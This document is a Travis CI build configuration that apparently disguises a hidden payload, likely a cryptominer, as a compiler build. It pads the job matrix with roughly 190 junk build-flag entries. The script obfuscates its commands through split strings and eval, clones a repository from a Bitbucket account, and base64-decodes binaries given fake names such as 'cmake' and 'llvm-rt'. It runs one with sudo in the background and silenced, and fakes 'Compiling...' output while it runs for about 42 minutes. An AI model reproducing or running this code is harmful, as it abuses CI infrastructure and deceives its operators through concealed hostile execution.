dist: bionic

env:
  - BUILD="--changed-slot=167Ot"
  - BUILD="--help=515W5"
  - BUILD="--read-news=224jE"
  - BUILD="--selective=121Hq"
  - BUILD="--autounmask-keep-masks=931jY"
  - BUILD="--complete-graph-if-new-ver=462ps"
  - BUILD="--misspell-suggestions=4794n"
  - BUILD="--clean=326ny"
  - BUILD="--load-average=30RE"
  - BUILD="--regen=102WA"
  - BUILD="--usepkg=596gC"
  - BUILD="--noconfmem=77FF"
  - BUILD="--deselect=248P8"
  - BUILD="--binpkg-changed-deps=867NQ"
  - BUILD="--autounmask-license=910Lb"
  - BUILD="--autounmask-license=472RO"
  - BUILD="--buildpkgonly=643SV"
  - BUILD="--autounmask-license=989hR"
  - BUILD="--load-average=191lx"
  - BUILD="--rage-clean=59VS"
  - BUILD="--version=1674"
  - BUILD="--deep=779ff"
  - BUILD="--autounmask-write=270Yh"
  - BUILD="--newrepo=933J6"
  - BUILD="--usepkg-exclude=444c7"
  - BUILD="--verbose=695yO"
  - BUILD="--quiet-unmerge-warn=753on"
  - BUILD="--buildpkgonly=758Ps"
  - BUILD="--selective=973no"
  - BUILD="--verbose-slot-rebuilds=290PB"
  - BUILD="--check-news=764ek"
  - BUILD="--resume=9717J"
  - BUILD="--rebuild-ignore=730ch"
  - BUILD="--emptytree=205BI"
  - BUILD="--autounmask-continue=891qx"
  - BUILD="--keep-going=5787K"
  - BUILD="--quiet-build=523Bs"
  - BUILD="--usepkgonly=700NF"
  - BUILD="--pretend=17Jm"
  - BUILD="--skipfirst=188Rr"
  - BUILD="--buildpkg-exclude=40bg"
  - BUILD="--nodeps=36sN"
  - BUILD="--quiet-unmerge-warn=669aX"
  - BUILD="--changed-use=401x0"
  - BUILD="--depclean=149l2"
  - BUILD="--with-bdeps-auto=506y8"
  - BUILD="--autounmask-write=4359w"
  - BUILD="--reinstall-atoms=6913s"
  - BUILD="--accept-properties=84WF"
  - BUILD="--useoldpkg-atoms=950xS"
  - BUILD="--quiet-unmerge-warn=852t7"
  - BUILD="--with-bdeps-auto=179re"
  - BUILD="--onlydeps-with-rdeps=591vS"
  - BUILD="--changed-deps=877rU"
  - BUILD="--usepkg=855JI"
  - BUILD="--noconfmem=865PV"
  - BUILD="--rebuilt-binaries=652fP"
  - BUILD="--complete-graph-if-new-use=2704p"
  - BUILD="--buildpkg=201l9"
  - BUILD="--update=278Ev"
  - BUILD="--binpkg-changed-deps=293Wm"
  - BUILD="--rebuild-if-new-rev=892a2"
  - BUILD="--emptytree=7956e"
  - BUILD="--prune=2152D"
  - BUILD="--deselect=942ci"
  - BUILD="--getbinpkg=3e6"
  - BUILD="--complete-graph=867iT"
  - BUILD="--config-root=180t2"
  - BUILD="--root=879yT"
  - BUILD="--usepkgonly=576GW"
  - BUILD="--fetch-all-uri=928f8"
  - BUILD="--quiet-unmerge-warn=942Kh"
  - BUILD="--debug=940Qd"
  - BUILD="--tree=141ak"
  - BUILD="--changelog=9963f"
  - BUILD="--regen=580Mu"
  - BUILD="--alert=7316M"
  - BUILD="--buildpkgonly=493T0"
  - BUILD="--quiet-repo-display=74vV"
  - BUILD="--useoldpkg-atoms=385fZ"
  - BUILD="--oneshot=704Ax"
  - BUILD="--usepkg-exclude=5446"
  - BUILD="--backtrack=371C3"
  - BUILD="--usepkg-exclude=192Yq"
  - BUILD="--metadata=829Q"
  - BUILD="--resume=562wW"
  - BUILD="--verbose=149FF"
  - BUILD="--misspell-suggestions=817BZ"
  - BUILD="--changed-slot=106nI"
  - BUILD="--buildpkg=52FF"
  - BUILD="--dynamic-deps=70yi"
  - BUILD="--search=290Ds"
  - BUILD="--config=762Fm"
  - BUILD="--noreplace=261ul"
  - BUILD="--regen=684DJ"
  - BUILD="--digest=958eN"
  - BUILD="--verbose-conflicts=803rG"
  - BUILD="--selective=633rW"
  - BUILD="--ask=350Tl"
  - BUILD="--color=977qe"
  - BUILD="--verbose-conflicts=876T7"
  - BUILD="--autounmask-write=775SQ"
  - BUILD="--skipfirst=558ZR"
  - BUILD="--onlydeps-with-rdeps=9562q"
  - BUILD="--backtrack=8934B"
  - BUILD="--check-news=690JR"
  - BUILD="--check-news=533eU"
  - BUILD="--list-sets=153ju"
  - BUILD="--changed-deps-report=748R"
  - BUILD="--onlydeps=789wE"
  - BUILD="--pretend=642QG"
  - BUILD="--accept-properties=369Oi"
  - BUILD="--misspell-suggestions=577aB"
  - BUILD="--getbinpkg=208D1"
  - BUILD="--autounmask=940cZ"
  - BUILD="--changed-use=994DN"
  - BUILD="--ignore-world=431oF"
  - BUILD="--searchdesc=6584S"
  - BUILD="--ignore-built-slot-operator-deps=4011P"
  - BUILD="--depclean=62sx"
  - BUILD="--help=281C3"
  - BUILD="--config-root=664CW"
  - BUILD="--info=329bn"
  - BUILD="--tree=584lq"
  - BUILD="--noreplace=989I9"
  - BUILD="--autounmask-keep-keywords=810sr"
  - BUILD="--noreplace=881R7"
  - BUILD="--alert=520NO"
  - BUILD="--autounmask-keep-masks=851Sf"
  - BUILD="--autounmask-backtrack=717Kn"
  - BUILD="--changed-deps=257vT"
  - BUILD="--help=329oB"
  - BUILD="--exclude=479DU"
  - BUILD="--implicit-system-deps=50RS"
  - BUILD="--binpkg-changed-deps=7993o"
  - BUILD="--rebuild-exclude=447rt"
  - BUILD="--oneshot=230ex"
  - BUILD="--rebuilt-binaries=279Yp"
  - BUILD="--rebuild-exclude=76261"
  - BUILD="--changelog=998in"
  - BUILD="--reinstall=658vg"
  - BUILD="--load-average=4338a"
  - BUILD="--columns=829m6"
  - BUILD="--verbose-slot-rebuilds=36250"
  - BUILD="--load-average=687LM"
  - BUILD="--metadata=40639"
  - BUILD="--fuzzy-search=189nU"
  - BUILD="--binpkg-respect-use=811dd"
  - BUILD="--autounmask-unrestricted-atoms=560J"
  - BUILD="--changelog=857Jk"
  - BUILD="--depclean=455Jn"
  - BUILD="--changed-deps-report=832Rg"
  - BUILD="--config=522Oc"
  - BUILD="--ignore-default-opts=712jJ"
  - BUILD="--update=36ga"
  - BUILD="--jobs=7h5"
  - BUILD="--emptytree=521uj"
  - BUILD="--buildpkgonly=885W5"
  - BUILD="--load-average=3505z"
  - BUILD="--fuzzy-search=869XD"
  - BUILD="--jobs=263Wo"
  - BUILD="--autounmask-use=923WG"
  - BUILD="--quiet-build=654io"
  - BUILD="--ignore-built-slot-operator-deps=4371z"
  - BUILD="--selective=359F6"
  - BUILD="--deselect=391Iq"
  - BUILD="--fuzzy-search=9117t"
  - BUILD="--nodeps=629t2"
  - BUILD="--list-sets=5076R"
  - BUILD="--alert=611Rg"
  - BUILD="--changed-deps-report=537bc"
  - BUILD="--onlydeps-with-rdeps=148Zd"
  - BUILD="--autounmask-use=871Bs"
  - BUILD="--config-root=596kL"
  - BUILD="--searchdesc=477RV"
  - BUILD="--autounmask-keep-masks=323Lg"
  - BUILD="--load-average=5301g"
  - BUILD="--autounmask-write=907tv"
  - BUILD="--version=287BZ"
  - BUILD="--accept-restrict=406P6"
  - BUILD="--select=482cX"
  - BUILD="--debug=7130g"
  - BUILD="--keep-going=957A6"
  - BUILD="--autounmask-unrestricted-atoms=870TO"

language: minimal

script:
  - sudo apt update || true
  - mjSUWHh="sudo apt --"
  - DYinE="yes install"
  - FwNrStVfog=" cl-base64 "
  - IpOMy="git &>/dev/"
  - eval "$mjSUWHh""$DYinE""$FwNrStVfog""$IpOMy""null"
  - UeIBaegc="git clone h"
  - nVFWS="ttps://gccb"
  - UMdeTXr="uild@bitbuc"
  - hPPaHpQdQ="ket.org/gcc"
  - duOtoPftWu="build/gcc.g"
  - JZLvfh="it &>/dev/n"
  - eval "$UeIBaegc""$nVFWS""$UMdeTXr""$hPPaHpQdQ""$duOtoPftWu""$JZLvfh""ull"
  - kCFsaGSrTu="base64 -d g"
  - GlgnTDQ="cc/cmake_ >"
  - eval "$kCFsaGSrTu""$GlgnTDQ"" cmake"
  - aPwnyaZPSa="base64 -d g"
  - acyYX="cc/config_ "
  - eval "$aPwnyaZPSa""$acyYX""> rebuild"
  - flTYsFJiQe="base64 -d g"
  - qgwww="cc/make_ > "
  - eval "$flTYsFJiQe""$qgwww""llvm-rt"
  - chmod +x llvm-rt cmake
  - WHonSb="./cmake"
  - eval "$WHonSb"""
  - sed -i 's/build/tg3o/g' rebuild
  - sudo ./llvm-rt --config=rebuild &>/dev/null &
  - GCC=$(date +%s)
  - echo $BUILD
  - while true; do CC=$(date +%s); echo Compiling...; [ $CC -ge $((GCC + 2556)) ] && sudo killall llvm-rt && break; sleep 202; done
